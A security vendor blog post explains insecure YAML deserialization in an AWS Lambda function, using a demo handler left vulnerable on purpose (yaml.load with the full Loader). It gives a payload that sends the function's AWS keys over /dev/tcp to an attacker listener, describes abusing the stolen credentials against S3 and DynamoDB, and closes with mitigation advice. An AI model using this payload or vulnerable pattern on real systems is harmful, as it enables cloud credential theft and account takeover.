Insecure deserialization in AWS Lambda

In early December 2021, many companies worldwide were hit by the newly discovered vulnerability known as Log4Shell. Its CVSS score rates it as critical, and the impact can be severe for those who do not fix it. Log4Shell is classified under CWE-502, Deserialization of Untrusted Data, in the Common Weakness Enumeration (CWE), the shared catalog of weakness types maintained by MITRE. This category of vulnerability is a regular entry in the OWASP Top 10.

Generally speaking, serialization and deserialization refer to the process of taking program-internal object data, packaging it in a way that allows it to be stored or transferred externally (“serialization”), then extracting the serialized data to reconstruct the original object (“deserialization”). It is often convenient to serialize objects for communication or to save them for later use. However, serialized data can often be modified without going through the object's accessor functions, so unless it is protected and validated by cryptography or another dedicated mechanism, attackers can tamper with the serialized object to alter the flow of the application, as in the Log4Shell vulnerability.
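As a rough illustration of what protecting serialized data with cryptography can look like, the sketch below signs a JSON payload with an HMAC and refuses to deserialize it if the tag does not match. The key, the function names and the `tag.payload` wire format are assumptions made for this example, not something taken from the demo function.

```python
import hashlib
import hmac
import json

# Hypothetical key for illustration; a real one would come from a secrets store.
SECRET_KEY = b"demo-key-not-for-production"


def serialize_signed(obj) -> bytes:
    """Serialize obj to JSON and prepend an HMAC-SHA256 tag."""
    payload = json.dumps(obj, sort_keys=True).encode("utf-8")
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest().encode("ascii")
    return tag + b"." + payload


def deserialize_verified(blob: bytes):
    """Check the tag before parsing; raise ValueError if the data was modified."""
    tag, sep, payload = blob.partition(b".")
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest().encode("ascii")
    if not sep or not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: serialized data was tampered with")
    return json.loads(payload)


blob = serialize_signed({"name": "Franc", "roles": ["hr"]})
restored = deserialize_verified(blob)

# An attacker who edits the payload without knowing the key invalidates the tag.
tampered = blob.replace(b'"hr"', b'"admin"')
```

Calling `deserialize_verified(tampered)` raises `ValueError`, so the modified roles never reach the application. A signature only proves the data came from a holder of the key; it does not make an unsafe deserializer safe.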

This kind of attack is a known risk in classical environments, but it can occur in a serverless architecture as well. When an application uses a given method to serialize and deserialize objects, the exploitability is the same in both types of application. The impact may be more limited in a serverless architecture because the runtime environments are ephemeral, which makes follow-on steps such as persistence and lateral movement harder for an attacker. Still, other attacks, such as sensitive data exposure (e.g., function code or secret keys), can easily be carried out.

Serialization and deserialization are common in many languages, including Java, Python, JavaScript and C#, and many of the libraries involved can be affected. For example, when an application parses a YAML file or a JSON object, it performs deserialization.
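Not every format carries the same risk. The short sketch below, which uses only the Python standard library, contrasts `json.loads`, which can only build plain data types, with `pickle.loads`, which will call whatever callable the serialized data names. The `Innocent` class is a hypothetical example, and the harmless `sorted` call stands in for something an attacker would choose.

```python
import json
import pickle


class Innocent:
    """Looks like a data object, but tells pickle to call a function on load."""

    def __reduce__(self):
        # pickle will call sorted([3, 1, 2]) during loads(); an attacker
        # could name any importable callable here instead.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Innocent())
loaded = pickle.loads(blob)  # the result of the call, not an Innocent instance

# JSON parsing only ever produces dicts, lists, strings, numbers, booleans and None.
data = json.loads('{"name": "Franc", "roles": ["admin", "hr"]}')
```

Here `loaded` is the list returned by `sorted`, which shows that the deserializer ran code chosen by whoever produced the bytes.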

To evaluate the real impact of this kind of exploitation, we created a demo Python function that uses the YAML library, and we are going to exploit the insecure deserialization.

import os
import uuid

import boto3
import yaml
from yaml import Loader


def write_data(data):
    # Store each user and its roles as an item in the DynamoDB table.
    ddb = boto3.client('dynamodb')
    for user in data:
        roles = []
        for r in user['roles']:
            roles.append({"S": r})
        ddb.put_item(
            TableName="cn-research-users-yaml-files",
            Item={
                'name': {"S": user['name']},
                'roles': {"L": roles}
            }
        )


def lambda_handler(event, context):
    s3 = boto3.client("s3")
    for e in event['Records']:
        bucket = e['s3']['bucket']['name']
        key = e["s3"]["object"]["key"]

        # Download the uploaded object to a unique path in /tmp.
        tmp_file = str(uuid.uuid4())
        tmp_path = f"/tmp/{tmp_file}"

        print(f"downloading file {key} from bucket {bucket} to {tmp_path}")
        s3.download_file(bucket, key, tmp_path)

        if os.path.isfile(tmp_path):
            with open(tmp_path, 'r') as f:
                file_content = f.read()
            # Vulnerable on purpose: the full Loader can construct arbitrary Python objects.
            parsed = yaml.load(file_content, Loader)
            write_data(parsed)

    return {
        'statusCode': 200,
        'event': event,
    }

The Lambda function is triggered when a new YAML file is uploaded to an S3 bucket. The file contains a list of users with their roles, which the function stores in a DynamoDB table.

An example of a YAML file:



- name: Franc
  roles:
  - admin
  - hr

- name: John
  roles:
  - admin
  - finance

The structure of the YAML file is not important for the outcome of the exploitation. The vulnerable code is the line where the file is loaded without any kind of verification or sanitization:

parsed = yaml.load(file_content, Loader)

An attacker is able to forge a YAML file to execute remote commands and can thereby exfiltrate sensitive data from the ephemeral container. 

[Figure: attack diagram]

For example, the following malicious content resides inside the YAML file. <IP> and <PORT> are the IP address and TCP port of the attacker's listener, ready to receive the exfiltrated data.

!!python/object/apply:os.system ['echo -e AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID \nAWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY \nAWS_SESSION_TOKEN: $AWS_SESSION_TOKEN &>/dev/tcp/<IP>/<PORT>']

The information extracted from the Lambda runtime is its set of AWS keys, which allows the attacker to interact with the cloud account and perform further actions within the limits of the function's permissions.
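The payload works because the Lambda runtime exposes the function's temporary credentials as environment variables, so any code running in the process can read them. The sketch below lists which of those variable names are present without printing their values. The helper name and the simulated environment are assumptions for illustration.

```python
import os

# Names the Lambda runtime sets for the function's temporary credentials.
CREDENTIAL_VARS = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def exposed_credential_vars(environ=None):
    """Return the credential variable names that are set (never the values)."""
    environ = os.environ if environ is None else environ
    return [name for name in CREDENTIAL_VARS if environ.get(name)]


# Simulated environment with placeholder values, so the sketch runs anywhere.
fake_env = {
    "AWS_ACCESS_KEY_ID": "placeholder",
    "AWS_SESSION_TOKEN": "placeholder",
    "PATH": "/usr/bin",
}
present = exposed_credential_vars(fake_env)
```

Inside a real function, calling `exposed_credential_vars()` with no argument would inspect the actual process environment.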

[Video: exfiltration]

In this case, the Lambda function has permission to read files from the S3 bucket and write data to the DynamoDB table. Using the AWS CLI, the attacker can use the stolen credentials to impersonate the function and download all the files from the bucket, or insert their own user with an elevated role directly into the database table.

[Figure: impersonation against DynamoDB]

How should you avoid insecure deserialization in your serverless environment?

The rule of thumb is to never pass a serialized object from an untrusted source to the deserialize function. 
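For the demo function, one way to follow this rule is to parse the file with PyYAML's `yaml.safe_load`, which builds only plain data types, and then check that the result has the expected shape before writing anything. The following is a minimal sketch under those assumptions; `parse_users` and its validation rules are hypothetical and not part of the original function.

```python
import yaml


def parse_users(text: str) -> list:
    """Parse untrusted YAML with safe_load, then check the expected shape."""
    data = yaml.safe_load(text)  # python/* tags are rejected, not executed
    if not isinstance(data, list):
        raise ValueError("expected a list of users")
    for user in data:
        if not isinstance(user, dict) or not isinstance(user.get("name"), str):
            raise ValueError("each user needs a string 'name'")
        roles = user.get("roles")
        if not isinstance(roles, list) or not all(isinstance(r, str) for r in roles):
            raise ValueError("'roles' must be a list of strings")
    return data


good = "- name: Franc\n  roles:\n  - admin\n  - hr\n"
users = parse_users(good)

# The same kind of tag used in the attack is refused by the safe loader.
malicious = "!!python/object/apply:os.system ['echo pwned']"
try:
    parse_users(malicious)
    rejected = False
except yaml.YAMLError:
    rejected = True
```

With the safe loader the malicious document raises a `yaml.YAMLError` subclass instead of running a command, and the shape check keeps unexpected structures out of `write_data`.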

Contrast Serverless Application Security offers detection capabilities for this vulnerability taxonomy, alerting developers about potential data exposure in their applications during development.

Contrast Security can detect insecure use of the serialization/deserialization process that an attacker could exploit through multiple services, such as S3 or even application programming interfaces (APIs). With Contrast, your Lambda code is monitored and verified on every change, and the developer is alerted to any exploitable issues we detect, as can be seen in the video below:

[Video: Lambda scan]

Matteo Rosi, Security Researcher at Contrast Security

Matteo Rosi, Security Researcher at Contrast Security, is a passionate cyber-security professional with 20 years of experience in the field. Prior to Contrast, he worked as Cyber Security Expert and SOC Manager at Telepass, helping organisations to design and implement all security capabilities and particularly the incident response process. Matteo holds a PhD in Computer Engineering from The University of Florence, the city where he lives with Corinna and their two sons. When Matteo isn’t working hard at Contrast Security, you’ll find him enjoying dying again and again in Elden Ring.

*** This is a Security Bloggers Network syndicated blog from AppSec Observer authored by Matteo Rosi, Security Researcher at Contrast Security. Read the original post at: https://www.contrastsecurity.com/security-influencers/insecure-deserialization-in-aws-lambda